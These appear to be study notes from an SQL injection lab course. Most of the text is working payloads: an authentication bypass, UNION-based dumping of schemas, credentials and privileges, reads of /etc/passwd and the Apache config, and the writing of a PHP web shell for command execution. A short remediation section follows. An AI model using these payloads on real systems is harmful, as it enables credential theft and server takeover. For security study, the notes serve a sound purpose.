SQLi (SQL injection) notes
// authentication bypass
some' OR id=5)--
logged in as superadmin
// Unions
SELECT * FROM ports UNION SELECT * FROM ships;
SELECT * from products where product_id = '1' UNION SELECT username, password from passwords-- '
For advanced SQL injection, we may want to simply use 'NULL' to fill other columns,
as 'NULL' fits all data types.
mysql -u root -h 94.237.62.195 -P 54954
// detecting number of columns
Using ORDER BY
Increase the column index (ORDER BY 1, ORDER BY 2, ...) until we get an error saying the specified column doesn't exist; the largest value that still worked is the number of columns.
' order by 1-- -
' order by 2-- -
// other method using UNION
cn' UNION select 1,2,3-- -
// we get an error saying that the number of columns doesn't match
cn' UNION select 1,2,3,4-- -
// get DB version
cn' UNION select 1,@@version,3,4-- -
cn' UNION select 1,2,user(),4-- -
// find what Databases avail on the system
SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA;
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -
// find current DB
cn' UNION select 1,database(),2,3-- -
// other DB seems interesting
// find tables within Dev DB
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -
Note how we replaced the numbers '2' and '3' with 'TABLE_NAME' and 'TABLE_SCHEMA', to get the output of both columns in the same query.
// find columns
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -
// dump data
cn' UNION select 1, username, password, 4 from dev.credentials-- -
Don't forget to use dot notation (`dev.credentials`) to refer to the 'credentials' table in the 'dev' database,
since the query runs in the 'ilfreight' database, as discussed previously.
cn' UNION select 1,username,password,4 from ilfreight.users-- -
// find which user we are
cn' UNION SELECT 1, user(), 3, 4-- -
cn' UNION SELECT 1, user, 3, 4 from mysql.user-- -
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- -
// if we had many users
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -
// dump other privileges
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- -
// only perform dump for root
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -
// read file
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -
// To be able to write files to the back-end server through a MySQL database,
// we require three things:
1. A user with the FILE privilege enabled
2. The MySQL global secure_file_priv variable not enabled
3. Write access to the location we want to write to on the back-end server
cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -
// finding webroot
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-linux.txt
// windows:
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt
cn' union select 1,'file written successfully!',3,4 into outfile '/var/www/html/proof.txt'-- -
// shell time
cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -
// execute using shell.php?0=id
shell.php?0=find / -name flag*
// remediation
Remediation: input sanitization, input validation (e.g. regex allow-lists), least-privilege database user accounts, parameterized queries (prepared statements, as shown below), and a WAF.
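-- Least-privilege account for the application: it can only read ilfreight.ports,
-- so an injection through this connection cannot reach other tables, mysql.user
-- or the filesystem (no FILE privilege).
-- The password is set at creation time rather than in GRANT: the original two-step
-- form left a passwordless account between the two statements, and
-- `GRANT ... IDENTIFIED BY` is deprecated in MySQL 5.7 and rejected by MySQL 8.0.
CREATE USER 'reader'@'localhost' IDENTIFIED BY 'p@ssw0Rd!!';
GRANT SELECT ON ilfreight.ports TO 'reader'@'localhost';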
<SNIP>
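// Read the submitted credentials; default to '' so a missing field cannot
// trigger an undefined-index notice before the query runs.
$username = isset($_POST['username']) ? $_POST['username'] : '';
$password = isset($_POST['password']) ? $_POST['password'] : '';
// The '?' placeholders keep user-supplied values out of the SQL text, so quote
// and comment characters in the input can never change the statement structure.
$query = "SELECT * FROM logins WHERE username=? AND password = ?" ;
$stmt = mysqli_prepare($conn, $query);
if ($stmt === false) {
    // Fail loudly here instead of passing false into bind/execute below.
    throw new RuntimeException('mysqli_prepare failed: ' . mysqli_error($conn));
}
// 'ss': both values are bound as strings and sent separately from the query.
mysqli_stmt_bind_param($stmt, 'ss', $username, $password);
mysqli_stmt_execute($stmt);
$result = mysqli_stmt_get_result($stmt);
// get_result returns false on error; only fetch when a result set exists.
$row = ($result === false) ? null : mysqli_fetch_array($result);
mysqli_stmt_close($stmt);
// NOTE(review): comparing the raw password inside the SQL implies plaintext
// storage; store a hash (password_hash) and check it with password_verify
// after fetching the row by username only.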
<SNIP>
// final assessment
' or 1=1-- -
' union SELECT @@vERSION,2,3,4,5-- -
' union SELECT 1,@@vERSION,2,3,4-- -
search=TEST%27+union+SELECT+1%2Cload_file%28%22%2Fetc%2Fapache2%2Fapache2.conf%22%29%2C3%2C4%2C5--+-